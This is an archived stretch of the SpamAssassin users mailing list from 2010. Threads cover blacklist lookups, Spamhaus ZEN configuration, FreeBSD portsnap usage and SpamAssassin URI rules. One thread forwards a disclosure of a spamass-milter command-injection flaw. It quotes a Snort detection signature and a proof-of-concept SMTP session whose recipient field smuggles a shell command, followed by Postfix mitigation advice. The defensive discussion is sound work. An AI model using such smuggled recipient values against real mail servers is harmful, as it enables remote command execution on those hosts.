RE: How to find where email server has been blacklisted
That would be a very useful site, except that it shows the results as colour-coded icons, and I see the listed and not-listed icons as identical. -Original Message- From: Mikael Syska [mailto:mik...@syska.dk] Sent: 08 March 2010 01:56 To: users@spamassassin.apache.org Subject: Re: How to find where email server has been blacklisted Hi, This sites works for me: http://whatismyipaddress.com/staticpages/index.php/is-my-ip-address-blacklisted mvh On Mon, Mar 8, 2010 at 1:24 AM, Rops roberta3...@yahoo.com wrote: Hello I'm trying to figure out why some emails get lost, which most likely is due to emails killed by ISP spam filter due to high spam score these lost email have. How to find out if some mail server is blacklisted and where? Is there any central database for queries from all different blacklists? Also IP based search is required and data when and why. IP based search may be needed, as server under question has it's mailbox hosted with ISP, but I believe that still the virtual server can be blacklisted separately based on it's static IP and not the whole ISP mail server. Additional side effect is that emails sent inside company get lost more often - I believe because they virtual server is blacklisted somewhere and therefore emails sent always gather higher spam score. So the question is to find out where it's blacklisted? Thanks for any help and guidelines how and where to continue! -- View this message in context: http://old.nabble.com/How-to-find-where-email-server-has-been-blacklisted-tp27815915p27815915.html Sent from the SpamAssassin - Users mailing list archive at Nabble.com.
Scanning HUGE emails - headers only scan
Do you think it would make sense to introduce options for scanning headers only in big messages? I have received recently a new (small) wave of big spams. -- [plen: Andrew] Andrzej Adam Filip : a...@onet.eu There is nothing new except what has been forgotten. -- Marie Antoinette
Re: How to find where email server has been blacklisted
Hi, Then something is broken at your end ... I see 4 icons ... timeout, listed, non-listed and offline. Or am I missing your point here ? mvh On Mon, Mar 8, 2010 at 9:02 AM, Stanier, Alan M a...@essex.ac.uk wrote: That would be a very useful site, except that it shows the results as colour-coded icons, and I see the listed and not-listed icons as identical. -Original Message- From: Mikael Syska [mailto:mik...@syska.dk] Sent: 08 March 2010 01:56 To: users@spamassassin.apache.org Subject: Re: How to find where email server has been blacklisted Hi, This sites works for me: http://whatismyipaddress.com/staticpages/index.php/is-my-ip-address-blacklisted mvh On Mon, Mar 8, 2010 at 1:24 AM, Rops roberta3...@yahoo.com wrote: Hello I'm trying to figure out why some emails get lost, which most likely is due to emails killed by ISP spam filter due to high spam score these lost email have. How to find out if some mail server is blacklisted and where? Is there any central database for queries from all different blacklists? Also IP based search is required and data when and why. IP based search may be needed, as server under question has it's mailbox hosted with ISP, but I believe that still the virtual server can be blacklisted separately based on it's static IP and not the whole ISP mail server. Additional side effect is that emails sent inside company get lost more often - I believe because they virtual server is blacklisted somewhere and therefore emails sent always gather higher spam score. So the question is to find out where it's blacklisted? Thanks for any help and guidelines how and where to continue! -- View this message in context: http://old.nabble.com/How-to-find-where-email-server-has-been-blacklisted-tp27815915p27815915.html Sent from the SpamAssassin - Users mailing list archive at Nabble.com.
Re: How to find where email server has been blacklisted
On 08/03/2010 00:24, Rops wrote: I'm trying to figure out why some emails get lost, which most likely is due to emails killed by ISP spam filter due to high spam score these lost email have. How to find out if some mail server is blacklisted and where? Is there any central database for queries from all different blacklists? Also IP based search is required and data when and why. IP based search may be needed, as server under question has it's mailbox hosted with ISP, but I believe that still the virtual server can be blacklisted separately based on it's static IP and not the whole ISP mail server. Additional side effect is that emails sent inside company get lost more often - I believe because they virtual server is blacklisted somewhere and therefore emails sent always gather higher spam score. So the question is to find out where it's blacklisted? Thanks for any help and guidelines how and where to continue! I wrote a Perl app a while ago to do lots of DNSBL lookups - https://secure.grepular.com/projects/DNSBLSearch Example usage: m...@haven:~$ dnsblsearch.pl 92.48.122.147 94.76.192.48/29 m...@haven:~$ If I look up 127.0.0.2 it should be listed by most DNSBLs as it's a test IP: m...@haven:~$ dnsblsearch.pl 127.0.0.2 127.0.0.2 is listed on dnsbl-2.uceprotect.net 127.0.0.2 127.0.0.2 is listed on blackholes.five-ten-sg.com 127.0.0.2 127.0.0.2 is listed on combined.njabl.org 127.0.0.2, 127.0.0.6 127.0.0.2 is listed on bl.spamcop.net 127.0.0.2 127.0.0.2 is listed on list.dnswl.org 127.0.10.0 127.0.0.2 is listed on b.barracudacentral.org 127.0.0.2 127.0.0.2 is listed on ix.dnsbl.manitu.net 127.0.0.2 127.0.0.2 is listed on psbl.surriel.com 127.0.0.2 127.0.0.2 is listed on hostkarma.junkemailfilter.com 127.0.0.4, 127.0.0.5, 127.0.1.1, 127.0.1.2, 127.0.1.3, 127.0.2.3, 127.0.0.1, 127.0.0.2, 127.0.0.3 127.0.0.2 is listed on bl.spameatingmonkey.net 127.0.0.8, 127.0.0.10, 127.0.0.2, 127.0.0.3, 127.0.0.4 127.0.0.2 is listed on spamguard.leadmon.net 127.0.0.2 127.0.0.2 is listed on spamsources.fabel.dk 127.0.0.2 127.0.0.2 is listed on dnsbl-1.uceprotect.net 127.0.0.2 127.0.0.2 is listed on dnsbl.sorbs.net 127.0.0.4, 127.0.0.5, 127.0.0.6, 127.0.0.7, 127.0.0.8, 127.0.0.9, 127.0.0.10, 127.0.0.2, 127.0.0.3 127.0.0.2 is listed on ubl.unsubscore.com 127.0.0.2 127.0.0.2 is listed on zen.spamhaus.org 127.0.0.2, 127.0.0.4, 127.0.0.10 127.0.0.2 is listed on no-more-funn.moensted.dk 127.0.0.2 127.0.0.2 is listed on ips.backscatterer.org 127.0.0.2 127.0.0.2 is listed on dnsbl-3.uceprotect.net 127.0.0.2 m...@haven:~$ It does the lookups concurrantly so it's quite quick. -- Mike Cardwell - Perl/Java/Web developer, Linux admin, Email admin Read my tech Blog - https://secure.grepular.com/ Follow me on Twitter - http://twitter.com/mickeyc Hire me - http://cardwellit.com/ http://uk.linkedin.com/in/mikecardwell
Re: How to find where email server has been blacklisted
On 2010-03-08 1:24, Rops wrote: Hello I'm trying to figure out why some emails get lost, which most likely is due to emails killed by ISP spam filter due to high spam score these lost email have. How to find out if some mail server is blacklisted and where? Is there any central database for queries from all different blacklists? Also IP based search is required and data when and why. IP based search may be needed, as server under question has it's mailbox hosted with ISP, but I believe that still the virtual server can be blacklisted separately based on it's static IP and not the whole ISP mail server. Additional side effect is that emails sent inside company get lost more often - I believe because they virtual server is blacklisted somewhere and therefore emails sent always gather higher spam score. So the question is to find out where it's blacklisted? Thanks for any help and guidelines how and where to continue! http://www.robtex.com/
Zen.spamhous.org score for spam assassin...
Dear All, I want to use zen.spamhous.org for spam check. So we need to do entry in spam.lists.conf file. But do we need to mention score for it? If yes, where to do it? Thanks in advance, -- Kind regards, Dhaval Soni Red Hat Certified Architect RHCE No: 804007900325939 Cell: +91-966 20 29 620 * Wiki: https://fedoraproject.org/wiki/User:Sonidhaval
Re: Zen.spamhous.org score for spam assassin...
On 2010-03-08 12:29, Dhaval Soni wrote: Dear All, I want to use zen.spamhous.org for spam check. So we need to do entry in spam.lists.conf file. But do we need to mention score for it? If yes, where to do it? spam.lists.conf is not part of Spamassassin (sounds like MailScanner) Pls see: http://www.spamhaus.org/faq/answers.lasso?section=Spamhaus%20DBL
Re: Zen.spamhous.org score for spam assassin...
On Mon, 2010-03-08 at 16:59 +0530, Dhaval Soni wrote:
Dear All,
I want to use zen.spamhous.org for spam check. So we need to do entry
SA ships with Spamhaus ZEN enabled by default.
in spam.lists.conf file. But do we need to mention score for it? If
yes, where to do it?
That's not a SA configuration file.
Reminds me of your recent question, how to update latest bayes database.
This time, it is not urgent?
--
char *t=\10pse\0r\0dtu...@ghno\x4e\xc8\x79\xf4\xab\x51\x8a\x10\xf4\xf4\xc4;
main(){ char h,m=h=*t++,*x=t+2*h,c,i,l=*x,s=0; for (i=0;il;i++){ i%8? c=1:
(c=*++x); c128 (s+=h); if (!(h=1)||!t[s+h]){ putchar(t[s]);h=m;s=0; }}}
Re: How to find where email server has been blacklisted
On Mon, 2010-03-08 at 10:51 +0100, Mikael Syska wrote: Hi, Then something is broken at your end ... I see 4 icons ... timeout, listed, non-listed and offline. Or am I missing your point here ? *HINT* Are you colour blind or normal sighted?
Fw: spam filter using spamassassin mails
--- On Mon, 3/8/10, nehaya Mohammad nehaya.moham...@yahoo.com wrote: From: nehaya Mohammad nehaya.moham...@yahoo.com Subject: spam filter using spamassassin mails To: mailus...@spamassassin.apache.org Date: Monday, March 8, 2010, 10:23 AM Dear sir, I hope you doing fine. I'm a graduate student at University of Jordan and I'm doing my research in the use of Fuzzy clustering for email filtering.and Im using data from spamassasin in my expiremnts and i got results with success of 91% . I would like to use the filter developed by spamassasin to compare my results with yours on the same data set( emails) that you have in the website.. know that i would make sure if the filter you had bulid is bayesian based only or based on other techniques. if you have any other users who build spam filter and uses the mails that are available at you site,, i would appreciate if you could send me any reference about them.. I will very grateful if you can provide me with the implemenation of the tools you used Thanks, have a nice day is typing...
Re: Zen.spamhous.org score for spam assassin...
Dhaval Soni wrote on Mon, 8 Mar 2010 16:59:20 +0530: Dhaval Soni From this and your other message on this list I gather that you didn't read any documentation. So, please go and read documentation. There are also many tutorials on the web on using SA. I also deduce from spam.lists.conf that you are using MailScanner and did not read any documentation about it either nor even look in that file. *Read documentation before using complex software such as this!* If you don't understand what you are doing or reading hire someone to do it for you. Kai -- Get your web at Conactive Internet Services: http://www.conactive.com
Re: Zen.spamhous.org score for spam assassin...
Is zen.spamhous.org new? Personally I'd check your spelling ;-)
Re: Zen.spamhous.org score for spam assassin...
On 08/03/2010 12:34, Brian wrote: Is zen.spamhous.org new? Personally I'd check your spelling ;-) m...@haven:~$ host 1.0.0.127.zen.spamhous.org 1.0.0.127.zen.spamhous.org A 208.73.210.27 m...@haven:~$ host 1.2.3.4.zen.spamhous.org 1.2.3.4.zen.spamhous.orgA 208.73.210.27 m...@haven:~$ Wonder how many people that has tripped up in its time. -- Mike Cardwell - Perl/Java/Web developer, Linux admin, Email admin Read my tech Blog - https://secure.grepular.com/ Follow me on Twitter - http://twitter.com/mickeyc Hire me - http://cardwellit.com/ http://uk.linkedin.com/in/mikecardwell
Re: Zen.spamhous.org score for spam assassin...
On Mon, 2010-03-08 at 12:41 +, Mike Cardwell wrote: On 08/03/2010 12:34, Brian wrote: Is zen.spamhous.org new? Personally I'd check your spelling ;-) m...@haven:~$ host 1.0.0.127.zen.spamhous.org 1.0.0.127.zen.spamhous.org A 208.73.210.27 m...@haven:~$ host 1.2.3.4.zen.spamhous.org 1.2.3.4.zen.spamhous.orgA 208.73.210.27 m...@haven:~$ Wonder how many people that has tripped up in its time. I wonder if Claus at UCEProtect registered that? Two things make me wonder. First, he is said to be a cyber-squatter, but the clincher for me is using 'zen.spamhous.org' results in a positive return and high false positive rate }}} GRIN
Re: How to find where email server has been blacklisted
Hi On Mon, Mar 8, 2010 at 11:01 AM, Brian brel.astersik100...@copperproductions.co.uk wrote: On Mon, 2010-03-08 at 10:51 +0100, Mikael Syska wrote: Hi, Then something is broken at your end ... I see 4 icons ... timeout, listed, non-listed and offline. Or am I missing your point here ? *HINT* Are you colour blind or normal sighted? Ahhh, now I see the problem :-) Thanks for pointing it out to a very slow a tired mvh
Re: How to find where email server has been blacklisted
Rops wrote: How to find out if some mail server is blacklisted and where? Is there any central database for queries from all different blacklists? Also IP based search is required and data when and why. I've been using this one: http://www.mxtoolbox.com/blacklists.aspx I'm not sure what information you can get if you are listed. I have not had that problem so far. -- Bowie
Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)
Adam Katz wrote:
On 15-May-2009, at 12:46, Adam Katz wrote:
uri URI_HIDDEN /.{7}\/\../
LuKreme wrote:
That won't catch
http://www.spammer.example.com/.../hidden-malware.asf, it will only
catch the relative url form ../path/to/content which SA improperly
prefaces with http://;
uri URI_HIDDEN /.{8}\/\../
Works for me:
$ echo http://www.spammer.example.com/.../hidden-malware.asf |perl -ne
'$_ = http://$_; unless m{^[a-z]+://}; print hits\n if /.{8}\/\../'
hits
$
$ echo 'href=../not/a/hidden/directory' |perl -ne '$_ = http://$_;
unless m{^[a-z]+://}; print hits\n if /.{8}\/\../'
$
For some time now I've been running
uri LOCAL_URI_HIDDEN_DIR/.{8}\/\../
as discussed above and it works extremely well with few FPs.
However, today I did notice a FP on this type of URI with multiple
relative paths:
../../../../blah
So I've refined the rule to specifically exclude hitting on the sequence
../. which stops the rule triggering on multiple relative paths.
uri LOCAL_URI_HIDDEN_DIR/(?!.{6}\.\.\/\..).{8}\/\../
Tested, and all seems good so feel free to update if you're using this
rule locally.
Note: I'm still on 3.2.5 so I don't know if this rule ever got
officially picked up in 3.3.x
Re: SA 3.3.0 depends on Perl 5.10 (FreeBSD Ports)???
On Sun, Mar 7, 2010 at 10:26 PM, LuKreme krem...@kreme.com wrote: On 7-Mar-2010, at 10:08, LuKreme wrote: On 7-Mar-2010, at 08:31, Royce Williams wrote: Semi-OT, but portsnap(8) makes fetching the ports indexes no longer necessary. I'd never heard of it, but am reading the man page now. Sounds great! Quick question, if I do portsnap cron in the crontab, when do I do portsnap update? Short answer: To apply updates automatically, string the commands together (portsnap cron update). ro...@heffalump$ sudo portsnap cron update Removing old files and directories... done. Extracting new files: /usr/ports/devel/bugzilla/ /usr/ports/mail/postfix26/ Building new INDEX files... done. ro...@heffalump$ or hush it with: ro...@heffalump$ sudo portsnap cron update /dev/null ro...@heffalump$ Long details: This is getting pretty OT, but here is some more info; non-FreeBSD folk need not apply. :-) With this family of utilities by Colin Percival (which includes the OS-patching freebsd-update(8)), if you use only the 'cron' option, there will only be output when there is a change. This lets you schedule the check, only get notified when changes are actually downloaded, and then choose when to act on them. For portsnap(8), you may or may want to tack on a ' /dev/null' at the end, since updates to the ports tree are happening all the time. I do this, and I just let the weekly reports tell me when I have non-urgent updates available in my installed ports (weekly_status_pkg_enable=YES in [/usr/local]/etc/periodic.conf). I let portaudit(1) tell me daily if there are any vulnerabilities. Some folks want to know about updates to their ports right away, so they do something like this: ro...@heffalump$ portsnap cron update /dev/null portversion -v -L = lsof-4.83,5 needs updating (port has 4.84A,5) mysql-server-5.0.89 needs updating (port has 5.0.90) nmap-5.21 needs updating (port has 5.21_1) ro...@heffalump$ Other folks, especially those on low-bandwidth or metered connections, don't want to download actual updates until there are changes to ports that they care about. They use the '-I' option to just fetch the index (which also just fetches deltas, very low-bandwidth), and then compare the index with their installed ports to check for available updates: ro...@heffalump$ portsnap cron -I /dev/null portversion -vL = [same output as above] Since portsnap deltas are relatively low-bandwidth, I prefer a full daily sync so that I can casually install a new port and know that I'm getting a version less than 24 hours old. Share and Enjoy(TM). :-) Royce
Re: Zen.spamhous.org score for spam assassin...
This is slightly confusing. SA does use zen by default, but zen is an aggregate blacklist, and the tests are broken up into its pieces: RCVD_IN_PBL RCVD_IN_XBL RCVD_IN_SBL On 03/08, Dhaval Soni wrote: Dear All, I want to use [1]zen.spamhous.org for spam check. So we need to do entry in spam.lists.conf file. But do we need to mention score for it? If yes, where to do it? -- Every normal man must be tempted at times to spit upon his hands, hoist the black flag, and begin slitting throats. - Henry Louis Mencken (1880-1956) http://www.ChaosReigns.com
Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
just a heads up: I don't know if there is a problem with SA milter, but there is a snort signature for it now. Original Message Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt Date: Mon, 8 Mar 2010 13:03:52 + From: Kevin Ross kevros...@googlemail.com To: emerging-s...@emergingthreats.net emerging-s...@emergingthreats.net, Matt Jonkman jonk...@jonkmans.com alert tcp $EXTERNAL_NET any - $HOME_NET 25 (msg:ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt; flow:established,to_server; content:to|3A|; nocase; content:root+|3A|\|7C|; nocase; within:15; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578 http://www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140 http://seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;) Kev __ This email has been scanned and certified safe by SpammerTrap(r). For Information please see http://www.secnap.com/products/spammertrap/ __ ___ Emerging-sigs mailing list emerging-s...@emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs Support Emerging Threats! Get your ET Stuff! Tshirts, Coffee Mugs and Lanyards http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html
rules
Some messages receive score 0.00/0.00 and other receive the correct score like the example below. 2010-03-08 16:30:42.038813500 simscan:[63157]:SPAM REJECT (20.90/6.00):215.7090s:[SPAM] Catch the moment poltronieri! 85% Fire Sale:84.224.133.193:poltroni...@provale.com.br:poltroni...@provale.com.br 2010-03-08 16:30:43.816889500 simscan:[63232]:CLEAN (8.50/6.00):215.5769s:[SPAM] =?iso-8859-1?Q?Conquistando_o_padr=E3o_de_excel=EAncia_em_tratamento?=:200.234.196.130: acquasolut...@acquasolution.com:jua...@saaeg.com.br 2010-03-08 16:30:45.851526500 simscan:[63300]:CLEAN (2.40/6.00):215.5192s:Resposta Automatica:200.205.19.5: gbr...@carlsonwagonlit.com.br:kafeho...@kafehotel.com.br 2010-03-08 16:30:47.275884500 simscan:[67507]:CLEAN (0.00/0.00):2.9718s:Catch the moment preto! 85% Fire Sale:77.255.23.215: pr...@provale.com.br:pr...@provale.com.br 2010-03-08 16:30:48.497625500 simscan:[67657]:CLEAN (0.00/0.00):0.1194s:Comprovante da TED:200.234.214.155: netexpre...@hm2655.locaweb.com.br:f...@provale.com.br I'm updated SpamAssassin to p5-Mail-SpamAssassin-3.3.0_3 and rules are /var/db/spamassassin/3.003000/ . Can someone help me? -- Renata Dias
Spanish/Brazilian/Mexican spam
Hello! I think I asked about this once before. I keep getting foreign language spams with noobvious (to me) indicators that I could test for Can anyone take a look at this crud and see a header or flag/type that I could score in SA? http://pastebin.com/3gGiaZVK (Note: post is set to expire at 3pm Tues Mar 9) Thanks! - Charles
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Ned Slider wrote: Brian wrote: The key is this: If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied recipient (RCPT TO). POC IS $ nc localhost 25 220 ownthabox ESMTP Postfix (Ubuntu) mail from: me () me com 250 2.1.0 Ok rcpt to: root+:|touch /tmp/foo 250 2.1.5 Ok $ ls -la /tmp/foo -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses mail from: n...@example.com 250 2.1.0 Ok rcpt to: root+:|touch /tmp/foo 504 5.5.2 root+:|touch /tmp/foo: Recipient address rejected: need fully-qualified address quit 221 2.0.0 Bye Connection closed by foreign host. That's Postfix 2.3.3 on RHEL5 BTW :-) $ rpm -q postfix postfix-2.3.3-2.1.el5_2.x86_64
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
On Mon, 2010-03-08 at 20:16 +, Ned Slider wrote:
Brian wrote:
On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
just a heads up: I don't know if there is a problem with SA milter, but
there is a snort signature for it now.
Original Message
Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
Date: Mon, 8 Mar 2010 13:03:52 +
From: Kevin Ross kevros...@googlemail.com
To:emerging-s...@emergingthreats.net
emerging-s...@emergingthreats.net, Matt Jonkman jonk...@jonkmans.com
alert tcp $EXTERNAL_NET any - $HOME_NET 25 (msg:ET EXPLOIT Possible
SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt;
flow:established,to_server; content:to|3A|; nocase;
content:root+|3A|\|7C|; nocase; within:15; classtype:attempted-user;
reference:url,www.securityfocus.com/bid/38578
http://www.securityfocus.com/bid/38578;
reference:url,seclists.org/fulldisclosure/2010/Mar/140
http://seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
Kev
The key is this:
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
POC IS
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
504 5.5.2 root+:|touch /tmp/foo: Recipient address rejected: need
fully-qualified address
quit
221 2.0.0 Bye
Connection closed by foreign host.
That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)
It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}
Re: Spanish/Brazilian/Mexican spam
On Mon, 2010-03-08 at 14:56 -0500, Charles Gregory wrote: Can anyone take a look at this crud and see a header or flag/type that I could score in SA? I can't see anything immediately apart from the rather wackamoleish track of scoring the hidden URL in the body. If this trick: a href=http://www.spammer.com;www.niceguy.com/wellknown/outfit/a is at all common, there may be a case for writing a plugin that can detect the difference between URL and visible text. I haven't noticed them differing in the ham I receive, but ymmv. Martin
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
That's Postfix 2.3.3 on RHEL5 BTW :-) $ rpm -q postfix postfix-2.3.3-2.1.el5_2.x86_64 Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP time without using a the milter or something hideous like Amavis-crashalot? Perhaps if they added some features to that old dinosaur it would become a bit more useful as an MTA :-)
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Brian wrote:
On Mon, 2010-03-08 at 20:16 +, Ned Slider wrote:
Brian wrote:
On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
just a heads up: I don't know if there is a problem with SA milter, but
there is a snort signature for it now.
Original Message
Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote
Arbitrary Command Injection Attempt
Date: Mon, 8 Mar 2010 13:03:52 +
From: Kevin Ross kevros...@googlemail.com
To: emerging-s...@emergingthreats.net
emerging-s...@emergingthreats.net, Matt Jonkman jonk...@jonkmans.com
alert tcp $EXTERNAL_NET any - $HOME_NET 25 (msg:ET EXPLOIT Possible
SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt;
flow:established,to_server; content:to|3A|; nocase;
content:root+|3A|\|7C|; nocase; within:15; classtype:attempted-user;
reference:url,www.securityfocus.com/bid/38578
http://www.securityfocus.com/bid/38578;
reference:url,seclists.org/fulldisclosure/2010/Mar/140
http://seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
Kev
The key is this:
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
POC IS
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:|touch /tmp/foo
504 5.5.2 root+:|touch /tmp/foo: Recipient address rejected: need
fully-qualified address
quit
221 2.0.0 Bye
Connection closed by foreign host.
That's a Microsoft kind of answer if you don't mind me saying. Correct
me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a
bolt-on after thought for Postfix ;-)
It is easily mitigated by *not* running it with '-x' {Happy then
**WITHOUT** Postfix}
If I've understood the disclosure and PoC correctly, in order to
*remotely* exploit spamass-milter, you need to pass it malformed
recipient (RCPT TO) data from the MTA (as the MTA is your remotely
visible attach surface). If the MTA is RFC compliant and not accepting
clearly malformed non-FQDN recipient addresses then I fail to see how
you can remotely exploit spamass-milter, at least through the MTA.
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Brian wrote: That's Postfix 2.3.3 on RHEL5 BTW :-) $ rpm -q postfix postfix-2.3.3-2.1.el5_2.x86_64 Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP time without using a the milter or something hideous like Amavis-crashalot? Perhaps if they added some features to that old dinosaur it would become a bit more useful as an MTA :-) See this guide I've written: http://wiki.centos.org/HowTos/postfix_restrictions Specifically, # /etc/postfix/main.cf # Recipient restrictions: smtpd_recipient_restrictions = reject_unknown_recipient_domain
Re: Fwd: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Ned Slider wrote: Brian wrote: That's Postfix 2.3.3 on RHEL5 BTW :-) $ rpm -q postfix postfix-2.3.3-2.1.el5_2.x86_64 Tell me Ned, how do you get Postfix (2.3.3 on RHEL5) to reject at SMTP time without using a the milter or something hideous like Amavis-crashalot? Perhaps if they added some features to that old dinosaur it would become a bit more useful as an MTA :-) See this guide I've written: http://wiki.centos.org/HowTos/postfix_restrictions Specifically, # /etc/postfix/main.cf # Recipient restrictions: smtpd_recipient_restrictions = reject_unknown_recipient_domain Sorry, of course I meant: smtpd_recipient_restrictions = reject_non_fqdn_recipient
Re: Spanish/Brazilian/Mexican spam
Martin Gregorie wrote: On Mon, 2010-03-08 at 14:56 -0500, Charles Gregory wrote: Can anyone take a look at this crud and see a header or flag/type that I could score in SA? I can't see anything immediately apart from the rather wackamoleish track of scoring the hidden URL in the body. If this trick: a href=http://www.spammer.com;www.niceguy.com/wellknown/outfit/a is at all common, there may be a case for writing a plugin that can detect the difference between URL and visible text. I haven't noticed them differing in the ham I receive, but ymmv. Unfortunately, they frequently differ in ham. Usually due to someone wanting a clear URL visible to the user, but they want to have a tracking URL (frequently going to a 3rd party) when the user clicks the link. This is something that gets brought up here from time to time and while it sounds logical, it doesn't work. -- Bowie
Re: Spanish/Brazilian/Mexican spam
On Mon, 2010-03-08 at 15:49 -0500, Bowie Bailey wrote: Martin Gregorie wrote: On Mon, 2010-03-08 at 14:56 -0500, Charles Gregory wrote: Can anyone take a look at this crud and see a header or flag/type that I could score in SA? I can't see anything immediately apart from the rather wackamoleish track of scoring the hidden URL in the body. If this trick: a href=http://www.spammer.com;www.niceguy.com/wellknown/outfit/a is at all common, there may be a case for writing a plugin that can detect the difference between URL and visible text. I haven't noticed them differing in the ham I receive, but ymmv. Unfortunately, they frequently differ in ham. Usually due to someone wanting a clear URL visible to the user, but they want to have a tracking URL (frequently going to a 3rd party) when the user clicks the link. This is something that gets brought up here from time to time and while it sounds logical, it doesn't work. OK, thanks: idea filed in the NBG bin. Martin
Re: rules
On 8.3.2010 21:33, Renata Dias wrote: Some messages receive score 0.00/0.00 and other receive the correct score like the example below. ... I'm updated SpamAssassin to p5-Mail-SpamAssassin-3.3.0_3 and rules are /var/db/spamassassin/3.003000/ . Can someone help me? You showed a proof that some rules are having a correct score. You also told that some rules are showing zero score, but did not post any evidence. Indeed, some rules are scored as zero, but you are free to change the score in your local.cf or other local configuration file. It is possible that the result of those rules were uncertain in the mass tests of the developers, so the score was left 0. But we do not know. You only posted the rules behaving good. -- http://www.iki.fi/jarif/ Q: What is purple and concord the world? A: Alexander the Grape. signature.asc Description: OpenPGP digital signature
Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)
On Mon, 8 Mar 2010, Ned Slider wrote:
Adam Katz wrote:
On 15-May-2009, at 12:46, Adam Katz wrote:
uri URI_HIDDEN /.{7}\/\../
LuKreme wrote:
That won't catch
http://www.spammer.example.com/.../hidden-malware.asf, it will only
catch the relative url form ../path/to/content which SA improperly
prefaces with http://;
uri URI_HIDDEN /.{8}\/\../
Works for me:
$ echo http://www.spammer.example.com/.../hidden-malware.asf |perl -ne
'$_ = http://$_; unless m{^[a-z]+://}; print hits\n if /.{8}\/\../'
hits
$
$ echo 'href=../not/a/hidden/directory' |perl -ne '$_ = http://$_;
unless m{^[a-z]+://}; print hits\n if /.{8}\/\../'
$
For some time now I've been running
uri LOCAL_URI_HIDDEN_DIR/.{8}\/\../
as discussed above and it works extremely well with few FPs.
However, today I did notice a FP on this type of URI with multiple relative
paths:
../../../../blah
So I've refined the rule to specifically exclude hitting on the sequence ../.
which stops the rule triggering on multiple relative paths.
uri LOCAL_URI_HIDDEN_DIR/(?!.{6}\.\.\/\..).{8}\/\../
How about:
uri LOCAL_URI_HIDDEN_DIRm;.{8}/\..(?!/);
--
John Hardin KA7OHZhttp://www.impsec.org/~jhardin/
jhar...@impsec.orgFALaholic #11174 pgpk -a jhar...@impsec.org
key: 0xB8732E79 -- 2D8C 34F4 6411 F507 136C AF76 D822 E6E6 B873 2E79
---
Failure to plan ahead on someone else's part does not constitute
an emergency on my part. -- David W. Barts in a.s.r
---
6 days until Daylight Saving Time begins in U.S. - Spring Forward
Re: rules
Renata Dias wrote on Mon, 8 Mar 2010 16:33:15 -0300: Some messages receive score 0.00/0.00 and other receive the correct score like the example below. First: there's no evidence that these messages *should* score anything. Save them to a file and pipe them thru SA to see what they should score Second: you are using simscan which seems to be something qmail-related, so rather look there for a cause. For instance, have you checked that it is compatible with SA 3.3.0? Third: there are usually size limits for scanning Kai -- Get your web at Conactive Internet Services: http://www.conactive.com
Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)
John Hardin wrote:
On Mon, 8 Mar 2010, Ned Slider wrote:
So I've refined the rule to specifically exclude hitting on the
sequence ../. which stops the rule triggering on multiple relative paths.
uriLOCAL_URI_HIDDEN_DIR/(?!.{6}\.\.\/\..).{8}\/\../
How about:
uri LOCAL_URI_HIDDEN_DIRm;.{8}/\..(?!/);
Yes, that works too on my examples and is probably a more elegant
solution than mine :-)
John - are you able to try this rule in your sandbox and do mass checks?
I'd be interested to see how it scores.
Re: Hidden Dir in URI (Was: FreeMail plugin updated - banks)
On Mon, 8 Mar 2010, Ned Slider wrote:
